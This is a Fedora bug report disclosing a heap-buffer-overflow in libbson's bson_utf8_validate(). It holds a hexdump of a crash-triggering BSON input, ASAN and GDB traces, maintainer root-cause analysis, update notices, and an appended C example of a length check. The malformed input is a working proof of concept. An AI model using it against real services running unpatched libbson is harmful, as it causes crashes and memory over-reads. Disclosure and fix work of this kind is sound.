Bug 1489355

Summary: | There is a heap-buffer-overflow in bson_utf8_validate() function of libbson.
---|---
Product: | Fedora
Component: | libbson
Version: | rawhide
Status: | CLOSED ERRATA
Severity: | unspecified
Priority: | unspecified
Hardware: | Unspecified
OS: | Unspecified
Reporter: | owl337 <v.owl337>
Assignee: | Petr Pisar <ppisar>
QA Contact: | Fedora Extras Quality Assurance <extras-qa>
CC: | fedora, jesse, ppisar
URL: | https://jira.mongodb.org/projects/SECURITY/issues/SECURITY-476
Fixed In Version: | libbson-1.8.0-1.fc28
Type: | Bug
Last Closed: | 2018-01-04 09:14:20 UTC
Bug Blocks: | 1494401
Thank you for your report. It looks like this issue is not specific to the Fedora build and you should report your security findings directly to the libbson authors <https://docs.mongodb.com/manual/tutorial/create-a-vulnerability-report/> because the root problem is there. The problem is not in bson_utf8_validate(). The problem is that bson_iter_codewscope() computes the string length as 4294967295 and passes this wrong value to bson_utf8_validate() as the second utf8_len argument.

Created attachment 1323092 [details]
POC1 file input for examples/bson-metrics.c program
The reproducer runs examples/bson-metrics.c on this attached POC1 file with this content:
```
$ hexdump -C POC1
00000000  15 00 00 00 0f 00 0e 00  00 00 00 00 00 00 06 00  |................|
00000010  00 00 00 00 00 00 03 e8  88 88 00 00              |............|
0000001c
```
I can reproduce it with current upstream git code 1.7.0-rc0-24-g3dd28b6. And also with developmental 1.8.0-rc0 code. I forwarded it to <https://jira.mongodb.org/projects/SECURITY/issues/SECURITY-476>.

Bugfix in progress, here's a public description: https://jira.mongodb.org/browse/CDRIVER-2269
libbson crashes while iterating over a valid (but strange) BSON input. We'll release the fix next week.

*** Bug 1489356 has been marked as a duplicate of this bug. ***

*** Bug 1489362 has been marked as a duplicate of this bug. ***

libbson-1.8.0-1.fc27 has been submitted as an update to Fedora 27. https://bodhi.fedoraproject.org/updates/FEDORA-2017-1953158d1f

All Fedoras are affected. This is not reproducible with the reporter's sample but it's reproducible with the new tests added together with the fix. I will port it back.

libbson-1.6.3-2.fc26 has been submitted as an update to Fedora 26. https://bodhi.fedoraproject.org/updates/FEDORA-2017-a4cf96bcca

libbson-1.3.5-4.fc25 has been submitted as an update to Fedora 25. https://bodhi.fedoraproject.org/updates/FEDORA-2017-7edc2ea787

libbson-1.8.0-1.fc27 has been pushed to the Fedora 27 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-1953158d1f

libbson-1.6.3-2.fc26 has been pushed to the Fedora 26 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-a4cf96bcca

libbson-1.3.5-4.fc25 has been pushed to the Fedora 25 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-7edc2ea787

libbson-1.6.3-2.fc26 has been pushed to the Fedora 26 stable repository. If problems still persist, please make note of it in this bug report.

libbson-1.3.5-4.fc25 has been pushed to the Fedora 25 stable repository. If problems still persist, please make note of it in this bug report.

libbson-1.8.0-1.fc27 has been pushed to the Fedora 27 stable repository. If problems still persist, please make note of it in this bug report.
Created attachment 1323012 [details]
Triggered by " ./bson-metrics POC1"

Description of problem:
There is a heap-buffer-overflow in bson_utf8_validate() function of libbson.

Version-Release number of selected component (if applicable):
<= latest version

How reproducible:
./bson-metrics POC1

Steps to Reproduce:
The debugging information is as follows:

```
$ ./bson-metrics POC1
Segmentation fault
```

ASAN debugging information:

```
$ ./bson-metrics POC1
=================================================================
==61994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000b880 at pc 0x7f1da16706b7 bp 0x7ffe5cc1a480 sp 0x7ffe5cc1a478
READ of size 1 at 0x61900000b880 thread T0
    #0 0x7f1da16706b6 (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0xa96b6)
    #1 0x7f1da16394cb (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x724cb)
    #2 0x4dbe3c (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4dbe3c)
    #3 0x7f1da06d4abf (/lib/x86_64-linux-gnu/libc.so.6+0x20abf)
    #4 0x435648 (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x435648)

0x61900000b880 is located 0 bytes to the right of 1024-byte region [0x61900000b480,0x61900000b880)
allocated by thread T0 here:
    #0 0x4bc78b (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4bc78b)
    #1 0x7f1da1662aff (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x9baff)
==61994==ABORTING
```

GDB debugging information:

```
(gdb) set args POC1
(gdb) r
...
Breakpoint 7, bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143
143	      if ((utf8_len - i) < seq_length) {
(gdb) c 1007
Will ignore next 1006 crossings of breakpoint 7.  Continuing.

Breakpoint 7, bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143
143	      if ((utf8_len - i) < seq_length) {
(gdb) i b
Num     Type           Disp Enb Address            What
7       breakpoint     keep y   0x00007ffff7b7e310 in bson_utf8_validate at src/bson/bson-utf8.c:143
	breakpoint already hit 1008 times
(gdb) n
151	      c = utf8[i] & first_mask;
(gdb)
156	      for (j = i + 1; j < (i + seq_length); j++) {
(gdb)
182	      if (c > 0x0010FFFF) {
(gdb)
197	      switch (seq_length) {
(gdb)
199	         if (c <= 0x007F) {
(gdb)
130	   for (i = 0; i < utf8_len; i += seq_length) {
(gdb) n
=================================================================
==100494==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000b880 at pc 0x7ffff7b7e6b7 bp 0x7fffffffd800 sp 0x7fffffffd7f8
READ of size 1 at 0x61900000b880 thread T0
    #0 0x7ffff7b7e6b6 (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0xa96b6)
    #1 0x7ffff7b474cb (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x724cb)
    #2 0x4dbe3c (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4dbe3c)
    #3 0x7ffff6be2abf (/lib/x86_64-linux-gnu/libc.so.6+0x20abf)
    #4 0x435648 (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x435648)

0x61900000b880 is located 0 bytes to the right of 1024-byte region [0x61900000b480,0x61900000b880)
allocated by thread T0 here:
    #0 0x4bc78b (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4bc78b)
    #1 0x7ffff7b70aff (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x9baff)
==100494==ABORTING
[Inferior 1 (process 100494) exited with code 01]
(gdb) bt
#0  bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143
#1  0x00007ffff7b474cc in bson_iter_visit_all (iter=<optimized out>, visitor=<optimized out>, data=<optimized out>) at src/bson/bson-iter.c:2069
#2  0x00000000004dbe3d in bson_metrics (data=<optimized out>, bson=<optimized out>, length=<optimized out>) at bson-metrics.c:208
#3  main (argc=<optimized out>, argv=<optimized out>) at bson-metrics.c:257
```

This vulnerability was triggered in function bson_utf8_validate() at line src/bson/bson-utf8.c:130:

```
130	   for (i = 0; i < utf8_len; i += seq_length) {
131	      _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);
132	
133	      /*
134	       * Ensure we have a valid multi-byte sequence length.
135	       */
136	      if (!seq_length) {
137	         return false;
138	      }
139	
140	      /*
141	       * Ensure we have enough bytes left.
142	       */
143	      if ((utf8_len - i) < seq_length) {
144	         return false;
145	      }
146	      ...
```

Actual results:
crash

Expected results:
crash

Additional info:
Credits:
This vulnerability was detected by team OWL337, with our custom fuzzer collAFL. Please contact ganshuitao and chaoz.cn if you need more info about the team, the tool or the vulnerability.
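The comments above pin the root cause on the code_w_scope string length: a length field of 0 minus the NUL terminator wraps to 4294967295, which then drives the bson_utf8_validate() loop past the 1024-byte buffer. The following example is added here and is not libbson's code nor any participant's: it reproduces that arithmetic on the attached POC1 bytes (copied from the hexdump above) and shows the kind of consistency check a parser should apply to the three lengths of a code_w_scope value before touching the string. The function and variable names, and the well-formed `good_cws` value, are constructed for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* POC1, byte for byte as in the hexdump attached to this bug (28 bytes). */
static const uint8_t poc1[] = {
    0x15, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0xe8, 0x88, 0x88, 0x00, 0x00 };
/* Constructed well-formed code_w_scope value: code "a", empty scope document. */
static const uint8_t good_cws[] = {
    0x0f, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 'a', 0x00, 0x05, 0x00, 0x00, 0x00, 0x00 };

/* Little-endian int32 read with no alignment assumptions. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The arithmetic the comments describe: code length = string-length field minus the NUL.
 * A zero field wraps to 4294967295, the utf8_len shown in the gdb session. */
uint32_t naive_code_len(const uint8_t *val) { return le32(val + 4) - 1; }

/* Hypothetical length check (not libbson's code) for a code_w_scope value at `val` with
 * `avail` bytes left in the document. BSON layout of the value:
 *   int32 total | int32 slen | slen bytes of code incl. NUL | scope document (>= 5 bytes)
 * Succeeds, storing the code length without NUL in *code_len, only if all lengths agree. */
bool codewscope_lengths_ok(const uint8_t *val, size_t avail, uint32_t *code_len)
{
    const uint32_t min_total = 4 + 4 + 1 + 5;                 /* empty code, empty scope */
    if (avail < min_total) return false;
    uint32_t total = le32(val);
    if (total < min_total || total > avail) return false;
    uint32_t slen = le32(val + 4);
    if (slen < 1 || slen > total - (min_total - 1)) return false;  /* slen == 0 is POC1's case */
    if (val[8 + slen - 1] != 0) return false;                 /* code must be NUL-terminated */
    uint32_t scope_len = le32(val + 8 + slen);
    if (scope_len < 5 || scope_len != total - 8 - slen) return false;
    *code_len = slen - 1;
    return true;
}

int main(void)
{
    uint32_t n = 0;  /* POC1's value starts at offset 6: after doc length, type 0x0f, key "" */
    printf("POC1 naive code length: %u\n", naive_code_len(poc1 + 6));
    printf("POC1 passes check: %d\n", codewscope_lengths_ok(poc1 + 6, sizeof poc1 - 6, &n));
    bool ok = codewscope_lengths_ok(good_cws, sizeof good_cws, &n);
    printf("good value passes check: %d, code length %u\n", ok, n);
    return 0;
}
```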